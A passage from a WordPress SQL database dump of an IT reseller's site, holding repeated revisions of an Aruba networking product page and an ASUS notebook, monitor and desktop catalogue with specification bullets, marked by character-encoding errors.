alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n<center<[maxbutton id=\"1\" ]</center>','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 16:02:01','2019-09-18 08:02:01','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3194,1,'2019-09-18 16:06:05','2019-09-18 08:06:05','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n\r\n<div class=\"subheadline\">\r\n\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n&nbsp;\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n&nbsp;\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n&nbsp;\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n<center<[maxbutton id=\"1\" ]</center>','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 16:06:05','2019-09-18 08:06:05','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3195,1,'2019-09-18 16:07:06','2019-09-18 08:07:06','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n\r\n<div class=\"subheadline\">\r\n\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n&nbsp;\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n&nbsp;\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n&nbsp;\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n&nbsp;\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n<center<[maxbutton id=\"1\" ]</center>','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 16:07:06','2019-09-18 08:07:06','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3196,1,'2019-09-18 16:07:39','2019-09-18 08:07:39','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n\r\n<div class=\"subheadline\">\r\n\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n&nbsp;\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n&nbsp;\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n&nbsp;\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n&nbsp;\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n<center>[maxbutton id=\"1\" ]</center>','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 16:07:39','2019-09-18 08:07:39','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3197,1,'2019-09-18 16:07:57','2019-09-18 08:07:57','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n\r\n<div class=\"subheadline\">\r\n\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n&nbsp;\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n&nbsp;\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n&nbsp;\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n&nbsp;\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2019-09-18 16:07:57','2019-09-18 08:07:57','',1440,'https://bintara.com.my/blog/2019/09/18/1440-revision-v1/',0,'revision','',0),(3198,1,'2019-09-18 16:10:25','2019-09-18 08:10:25','<h2>NOTEBOOK</h2>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>MONITOR</h3>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>DESKTOP</h3>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	